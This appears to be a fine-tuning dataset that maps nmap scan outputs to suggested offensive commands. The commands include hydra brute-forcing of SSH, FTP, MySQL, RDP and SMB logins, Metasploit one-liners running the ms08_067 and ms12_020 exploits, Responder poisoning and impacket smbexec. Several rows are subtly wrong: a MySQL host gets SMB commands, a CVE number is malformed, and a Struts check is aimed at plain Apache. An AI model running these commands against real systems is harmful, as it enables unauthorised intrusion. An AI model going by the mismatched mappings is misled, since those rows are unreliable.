| instruction
				 stringlengths 39 233 | input
				 stringclasses 1
				value | output
				 stringlengths 56 213 | 
|---|---|---|
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https | 
	nikto -h http://192.168.1.10
dirb http://192.168.1.10
wpscan --url https://192.168.1.10 --enumerate p | |
| 
	Host is up (0.0025s latency).
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
3306/tcp open  mysql | 
	hydra -l root -P /path/to/wordlist.txt ssh://192.168.1.20
nmap --script=ftp-anon.nse -p 21 192.168.1.20
mysql -h 192.168.1.20 -u root -p | |
| 
	Host is up (0.0030s latency).
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.29
443/tcp  open  https      Apache httpd 2.4.29
8080/tcp open  http-proxy Squid http proxy 3.5.27 | 
	nikto -h http://192.168.1.30
gobuster dir -u http://192.168.1.30 -w /path/to/wordlist.txt
nmap --script=http-headers -p 80,443 192.168.1.30 | |
| 
	Host is up (0.0012s latency).
PORT    STATE SERVICE
443/tcp open  https | 
	openssl s_client -connect 192.168.1.40:443
nikto -h https://192.168.1.40
nmap --script ssl-enum-ciphers -p 443 192.168.1.40 | |
| 
	Host is up (0.0025s latency).
PORT   STATE SERVICE
53/tcp open  domain | 
	dnsrecon -d example.com -t axfr -n 192.168.1.50
nmap --script=dns-zone-transfer -p 53 192.168.1.50
dig @192.168.1.50 example.com AXFR | |
| 
	Host is up (0.0012s latency).
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http | 
	hydra -l admin -P /path/to/wordlist.txt ftp://192.168.1.60
nmap --script ssh-brute -p 22 192.168.1.60
nikto -h http://192.168.1.60 | |
| 
	Host is up (0.0031s latency).
PORT     STATE SERVICE
8080/tcp open  http-proxy
8000/tcp open  http-alt | 
	gobuster dir -u http://192.168.1.70:8080 -w /path/to/wordlist.txt
nmap --script=http-vuln-cve2014-0160 -p 8080 192.168.1.70
dirb http://192.168.1.70:8000 | |
| 
	Host is up (0.0042s latency).
PORT    STATE SERVICE
1433/tcp open  ms-sql-s | 
	nmap --script=ms-sql-info -p 1433 192.168.1.80
sqlmap -u "http://192.168.1.80" --dbs
hydra -l sa -P /path/to/wordlist.txt mssql://192.168.1.80 | |
| 
	PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http | 
	ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | |
| 
	PORT    STATE SERVICE
445/tcp open  microsoft-ds | 
	smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス> | |
| 
	PORT    STATE SERVICE
21/tcp  open  ftp | 
	ftp <IPアドレス>
hydra -l anonymous -P /usr/share/wordlists/rockyou.txt ftp://<IPアドレス>
nmap --script ftp-anon.nse -p21 <IPアドレス> | |
| 
	PORT    STATE SERVICE
3306/tcp open  mysql | 
	mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス> | |
| 
	PORT    STATE SERVICE
25/tcp  open  smtp | 
	telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
msfconsole -q -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <IPアドレス>; run" | |
| 
	PORT    STATE SERVICE
53/tcp  open  domain | 
	dig @<IPアドレス> example.com axfr
dnsrecon -d example.com -t axfr
host example.com <IPアドレス> | |
| 
	PORT     STATE SERVICE
3389/tcp open  ms-wbt-server | 
	rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス> | |
| 
	PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds | 
	smbclient //10.10.10.5/share
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス> | |
| 
	PORT     STATE SERVICE VERSION
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
443/tcp  open  ssl/http Apache httpd 2.4.41 ((Ubuntu)) | 
	nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
sslscan https://<IPアドレス>] | |
| 
	PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu)) | 
	ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu)) | 
	ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
23/tcp   open telnet   Linux telnetd
80/tcp   open http     Apache httpd 2.4.41 ((Ubuntu))
443/tcp  open ssl/http Apache httpd 2.4.41 ((Ubuntu)) | 
	telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
5000/tcp open upnp     Portable SDK for UPnP devices (Linux)
80/tcp   open http     Apache httpd 2.4.41 ((Ubuntu))
443/tcp  open ssl/http Apache httpd 2.4.41 ((Ubuntu)) | 
	curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp   open http       Apache httpd 
443/tcp  open ssl/http   Apache httpd | 
	curl --proxy <IP>:8080 http://example.com 
gobuster dir --proxy <IP>:8080 --url=http://example.com 
nikto --proxy=http://<ip>:8080 --host=http://example.com | |
| 
	PORT      STATE SERVICE VERSION
111/tcp   open rpcbind 
2049/tcp  open nfs_acl 
80/tcp    open http     
443/tcp   open ssl/http | 
	showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip> | |
| 
	PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu)) | 
	ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
445/tcp open  microsoft-ds Windows XP microsoft-ds
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn | 
	smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
msfconsole -q -x "use exploit/windows/smb/ms08_067_netapi; set RHOSTS <IPアドレス>; run" | |
| 
	PORT    STATE SERVICE VERSION
3306/tcp open  mysql    MySQL 5.7.29 | 
	mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
21/tcp  open  ftp      vsftpd 3.0.3 | 
	ftp <IPアドレス>
nmap --script ftp-anon.nse -p21 <IPアドレス>
hydra -l anonymous -P /usr/share/wordlists/rockyou.txt ftp://<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
25/tcp  open  smtp     Postfix smtpd | 
	telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
53/tcp  open  domain   ISC BIND 9.11.3-1ubuntu1.13 (Ubuntu Linux) | 
	dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services | 
	rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
8080/tcp open  http-proxy Squid http proxy
80/tcp   open  http       Apache httpd 
443/tcp  open  ssl/http   Apache httpd | 
	curl --proxy <IP>:8080 http://example.com 
gobuster dir --proxy <IP>:8080 --url=http://example.com 
nikto --proxy=http://<ip>:8080 --host=http://example.com | |
| 
	PORT    STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8)
80/tcp   open http Apache httpd 
443/tcp  open ssl/http Apache httpd | 
	curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
22/tcp   open ssh OpenSSH 7.2p2 Ubuntu (protocol 2.0)
80/tcp   open http Apache httpd 
443/tcp  open ssl/http Apache httpd 
2222/tcp open ssh OpenSSH (protocol 2.0) | 
	ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT      STATE SERVICE VERSION
111/tcp   open rpcbind 
2049/tcp  open nfs_acl 
80/tcp    open http     
443/tcp   open ssl/http | 
	showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip> | |
| 
	PORT     STATE SERVICE VERSION
23/tcp   open telnet Linux telnetd
80/tcp   open http Apache httpd 
443/tcp  open ssl/http Apache httpd | 
	telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
21/tcp   open ftp vsftpd 3.0.3
80/tcp   open http Apache httpd 
443/tcp  open ssl/http Apache httpd 
22/tcp   open ssh OpenSSH (protocol 2.0) | 
	ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
135/tcp   open msrpc Microsoft Windows RPC
139/tcp   open netbios Microsoft Windows netbios
445/tcp   open smb Microsoft Windows SMB | 
	smbclient //10.x.x.x/share 
enum4linux <ip address>
/opt/impacket/examples/smbclient.py <ip address> | |
| 
	PORT     STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x 
80/tcp   open http Apache httpd 
443/tcp  open ssl/http Apache httpd 
22/tcp   open ssh OpenSSH (protocol v2) | 
	/opt/impacket/examples/mysqlclient.py root:<password>@<ip address> | |
| 
	PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0) | 
	curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ssh user@<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.3
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu)) | 
	ftp <IPアドレス>
nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds | 
	smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
3306/tcp open  mysql    MySQL 5.7.29
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu)) | 
	mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd | 
	telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
53/tcp  open  domain   ISC BIND 9.11.3 (Ubuntu Linux)
80/tcp  open  http     Apache httpd | 
	dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス> | |
| 
	PORT     STATE SERVICE VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
80/tcp   open http Apache httpd 
443/tcp   open ssl/http Apache httpd | 
	rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス> | |
| 
	PORT     STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp   open http Apache httpd 
443/tcp   open ssl/http Apache httpd | 
	curl --proxy <IP>:8080 http://example.com 
gobuster dir --proxy <IP>:8080 --url=http://example.com 
nikto --proxy=http://<ip>:8080 --host=http://example.com | |
| 
	PORT    STATE SERVICE VERSION
5000/tcp open Werkzeug Python web server (Flask)
80/tcp   open Apache HTTPD 
443/tcp   open ssl/http Apache HTTPD | 
	curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
22/tcp   open ssh OpenSSH (protocol v2)
80/tcp   open http Apache HTTPD 
443/tcp   open ssl/http Apache HTTPD 
2222/tcp open ssh OpenSSH (protocol v2) | 
	ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT      STATE SERVICE VERSION
111/tcp   open rpcbind 
2049/tcp  open nfs_acl 
80/tcp    open http     
443/tcp   open ssl/http | 
	showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip> | |
| 
	PORT     STATE SERVICE VERSION
23/tcp   open telnet Linux telnetd
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
21/tcp   open ftp vsftpd v3.x.x
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
135/tcp   open msrpc Microsoft Windows RPC
139/tcp   open netbios Microsoft Windows netbios
445/tcp   open smb Microsoft Windows SMB | 
	/opt/impacket/examples/smbclient.py //10.x.x.x/share 
/opt/impacket/examples/rpcdump.py @10.x.x.x 
/opt/impacket/examples/smbexec.py [email protected] | |
| 
	PORT     STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x 
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	/opt/impacket/examples/smbclient.py //10.x.x.x/share 
/opt/impacket/examples/rpcdump.py @10.x.x.x 
/opt/impacket/examples/smbexec.py [email protected] | |
| 
	PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
22/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0) | 
	curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ssh user@<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.3
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu)) | 
	ftp <IPアドレス>
nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds | 
	smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
3306/tcp open  mysql    MySQL 5.7.29
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu)) | 
	mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
25/tcp  open  smtp     Postfix smtpd
80/tcp  open  http     Apache httpd | 
	telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス> | |
| 
	PORT    STATE SERVICE VERSION
53/tcp  open  domain   ISC BIND 9.11.3 (Ubuntu Linux)
80/tcp  open  http     Apache httpd | 
	dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス> | |
| 
	PORT     STATE SERVICE VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
80/tcp   open http Apache httpd 
443/tcp   open ssl/http Apache httpd | 
	rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス> | |
| 
	PORT     STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp   open http Apache httpd 
443/tcp   open ssl/http Apache httpd | 
	curl --proxy <IP>:8080 http://example.com 
gobuster dir --proxy <IP>:8080 --url=http://example.com 
nikto --proxy=http://<ip>:8080 --host=http://example.com | |
| 
	PORT    STATE SERVICE VERSION
5000/tcp open Werkzeug Python web server (Flask)
80/tcp   open Apache HTTPD 
443/tcp   open ssl/http Apache HTTPD | 
	curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT    STATE SERVICE VERSION
22/tcp   open ssh OpenSSH (protocol v2)
80/tcp   open http Apache HTTPD 
443/tcp   open ssl/http Apache HTTPD 
2222/tcp open ssh OpenSSH (protocol v2) | 
	ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT      STATE SERVICE VERSION
111/tcp   open rpcbind 
2049/tcp  open nfs_acl 
80/tcp    open http     
443/tcp   open ssl/http | 
	showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip> | |
| 
	PORT     STATE SERVICE VERSION
23/tcp   open telnet Linux telnetd
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
21/tcp   open ftp vsftpd v3.x.x
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt | |
| 
	PORT     STATE SERVICE VERSION
135/tcp   open msrpc Microsoft Windows RPC
139/tcp   open netbios Microsoft Windows netbios
445/tcp   open smb Microsoft Windows SMB | 
	/opt/impacket/examples/smbclient.py //10.x.x.x/share 
/opt/impacket/examples/rpcdump.py @10.x.x.x 
/opt/impacket/examples/smbexec.py [email protected] | |
| 
	PORT     STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x 
80/tcp   open http Apache HTTPD 
443/tcp  open ssl/http Apache HTTPD 
22/tcp   open ssh OpenSSH (protocol v2) | 
	/opt/impacket/examples/smbclient.py //10.x.x.x/share 
/opt/impacket/examples/rpcdump.py @10.x.x.x 
/opt/impacket/examples/smbexec.py [email protected] | |
| 
	Host is up (0.0034s latency).
PORT   STATE SERVICE  VERSION
21/tcp open  ftp      vsftpd 2.3.4
| ftp-vsftpd-backdoor: 
|   Backdoor exists, send the command `USER anonymous`.
|   Backdoor confirmed, exit with command `QUIT`. | 
	hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.20
searchsploit vsftpd 2.3.4
nmap --script=ftp-vsftpd-backdoor -p 21 10.10.10.20 | |
| 
	Host is up (0.0022s latency).
PORT    STATE SERVICE   VERSION
21/tcp  open  ftp       vsftpd 2.3.4
22/tcp  open  ssh       OpenSSH 4.7p1 Debian 8ubuntu1
80/tcp  open  http      Apache httpd 2.2.8
...
OS details: Linux 2.6.24 - 2.6.33 | 
	searchsploit metasploitable 2
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.30
hydra -l root -P /path/to/wordlist.txt ssh://10.10.10.30 | |
| 
	Host is up (0.0010s latency).
PORT     STATE SERVICE
8443/tcp open  https
| ssl-cert: Subject: commonName=Unifi Controller
|_  Issuer: commonName=Unifi | 
	nikto -h https://10.10.10.40:8443
searchsploit unifi controller
gobuster dir -u https://10.10.10.40:8443 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0012s latency).
PORT   STATE SERVICE  VERSION
21/tcp open  ftp      ProFTPD 1.3.5 | 
	hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.50
searchsploit proftpd 1.3.5
nmap --script=ftp-bounce -p 21 10.10.10.50 | |
| 
	Host is up (0.0034s latency).
PORT    STATE SERVICE   VERSION
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE: RDP vulnerability CVE-2012-020
|     State: VULNERABLE
...
OS details: Microsoft Windows Server 2008 R2 | 
	msfconsole -q -x "use exploit/windows/rdp/ms12_020_maxchannelids; set RHOST 10.10.10.60; run"
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.60
hydra -l Administrator -P /path/to/wordlist.txt rdp://10.10.10.60 | |
| 
	Host is up (0.0021s latency).
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
OS details: Microsoft Windows Server 2012 R2 | 
	nmap --script=smb-os-fingerprint -p 445 10.10.10.70
crackmapexec smb 10.10.10.70 -u 'user' -p 'password'
hydra -l user -P /path/to/wordlist.txt rdp://10.10.10.70 | |
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE   VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
OS details: Microsoft Windows XP SP2 | 
	nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.80
searchsploit ms08-067
hydra -l Administrator -P /path/to/wordlist.txt smb://10.10.10.80 | |
| 
	Host is up (0.0022s latency).
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp  open  http      Apache httpd 2.4.29
OS details: Linux 4.15 - 5.0 | 
	nmap --script=ssh-brute -p 22 10.10.10.90
nikto -h http://10.10.10.90
gobuster dir -u http://10.10.10.90 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0031s latency).
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.49
| http-methods:
|_  Supported Methods: GET POST OPTIONS | 
	nmap --script=http-vuln-cve2017-5638 -p 80 10.10.10.100
nikto -h http://10.10.10.100
gobuster dir -u http://10.10.10.100 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0022s latency).
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-vsftpd-backdoor:
|   Backdoor exists, send the command `USER anonymous`.
|   Backdoor confirmed, exit with command `QUIT`. | 
	hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.130
nmap --script=ftp-vsftpd-backdoor -p 21 10.10.10.130
searchsploit vsftpd 2.3.4 | |
| 
	Host is up (0.0013s latency).
PORT    STATE SERVICE   VERSION
3389/tcp open  ms-wbt-server
| rdp-vuln-ms12-020: 
|   VULNERABLE: RDP vulnerability CVE-2012-020
|     State: VULNERABLE
...
OS details: Microsoft Windows Server 2008 R2 | 
	msfconsole -q -x "use exploit/windows/rdp/ms12_020_maxchannelids; set RHOST 10.10.10.140; run"
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.140
hydra -l Administrator -P /path/to/wordlist.txt rdp://10.10.10.140 | |
| 
	Host is up (0.0012s latency).
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.6p1 Debian 4ubuntu0.3 | 
	hydra -l user -P /path/to/wordlist.txt ssh://10.10.10.150
nmap --script=ssh-brute -p 22 10.10.10.150
searchsploit openssh 7.6 | |
| 
	Host is up (0.0021s latency).
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.29
| http-methods:
|_  Supported Methods: GET POST OPTIONS | 
	nmap --script=http-vuln-cve2017-5638 -p 80 10.10.10.160
nikto -h http://10.10.10.160
gobuster dir -u http://10.10.10.160 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE  VERSION
3306/tcp open  mysql    MySQL 5.5.60-0+deb8u1 | 
	nmap --script=mysql-info -p 3306 10.10.10.170
mysql -u root -h 10.10.10.170 -p # パスワードがわかる場合
searchsploit mysql 5.5.60 | |
| 
	Host is up (0.0021s latency).
PORT    STATE SERVICE   VERSION
445/tcp open  microsoft-ds
OS details: Microsoft Windows 10 Home Edition | 
	nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.180
smbclient -L //10.10.10.180 -U user
hydra -l user -P /path/to/wordlist.txt smb://10.10.10.180 | |
| 
	Host is up (0.0023s latency).
PORT     STATE SERVICE    VERSION
8080/tcp open  http       Apache Tomcat 8.5.29 | 
	nmap --script=http-tomcat-users -p 8080 10.10.10.190
searchsploit apache tomcat 8.5.29
gobuster dir -u http://10.10.10.190:8080 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE  VERSION
27017/tcp open  mongodb 3.4.10 | 
	nmap --script=mongodb-databases -p 27017 10.10.10.200
mongo 10.10.10.200 --port 27017
searchsploit mongodb 3.4.10 | |
| 
	Host is up (0.0022s latency).
PORT     STATE SERVICE  VERSION
1194/tcp open  openvpn  OpenVPN 2.4.7 | 
	nmap --script=openvpn-version -p 1194 10.10.10.210
searchsploit openvpn 2.4.7
hydra -l user -P /path/to/wordlist.txt openvpn://10.10.10.210 | |
| 
	Host is up (0.0012s latency).
PORT     STATE SERVICE
8443/tcp open  https
| ssl-cert: Subject: commonName=Unifi Controller
|_  Issuer: commonName=Unifi | 
	nikto -h https://10.10.10.220:8443
gobuster dir -u https://10.10.10.220:8443 -w /path/to/wordlist.txt
searchsploit unifi controller | |
| 
	Host is up (0.0011s latency).
PORT     STATE SERVICE
22/tcp   open  ssh      OpenSSH 7.4
80/tcp   open  http     Apache httpd 2.4.18 | 
	gobuster dir -u http://10.10.10.230 -w /path/to/wordlist.txt
searchsploit apache 2.4.18
hydra -l root -P /path/to/wordlist.txt ssh://10.10.10.230 | |
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
139/tcp open  netbios-ssn | 
	responder -I eth0 # ネットワーク上でのLLMNR/NBNS/MDNSポイズニング
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.240
smbclient -L //10.10.10.240 -U guest | |
| 
	Host is up (0.0012s latency).
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.25 | 
	nikto -h http://10.10.10.250
searchsploit apache 2.4.25
gobuster dir -u http://10.10.10.250 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0010s latency).
PORT    STATE SERVICE  VERSION
3306/tcp open  mysql    MySQL 5.7.31-0ubuntu0.18.04.1 | 
	nmap --script=mysql-info -p 3306 10.10.10.260
mysql -u root -h 10.10.10.260 -p # パスワードがわかる場合
searchsploit mysql 5.7.31 | |
| 
	Host is up (0.0013s latency).
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp  open  http      Apache httpd 2.4.29
OS details: Linux 4.15 - 5.0 | 
	nmap --script=ssh-brute -p 22 10.10.10.270
nikto -h http://10.10.10.270
gobuster dir -u http://10.10.10.270 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0012s latency).
PORT     STATE SERVICE  VERSION
8080/tcp open  http     Jenkins 2.150.1 | 
	nmap --script=jenkins-version -p 8080 10.10.10.280
searchsploit jenkins 2.150.1
gobuster dir -u http://10.10.10.280:8080 -w /path/to/wordlist.txt | |
| 
	Host is up (0.0022s latency).
PORT     STATE SERVICE  VERSION
6379/tcp open  redis    Redis 4.0.14 | 
	nmap --script=redis-info -p 6379 10.10.10.290
redis-cli -h 10.10.10.290
searchsploit redis 4.0.14 | |
| 
	Host is up (0.0012s latency).
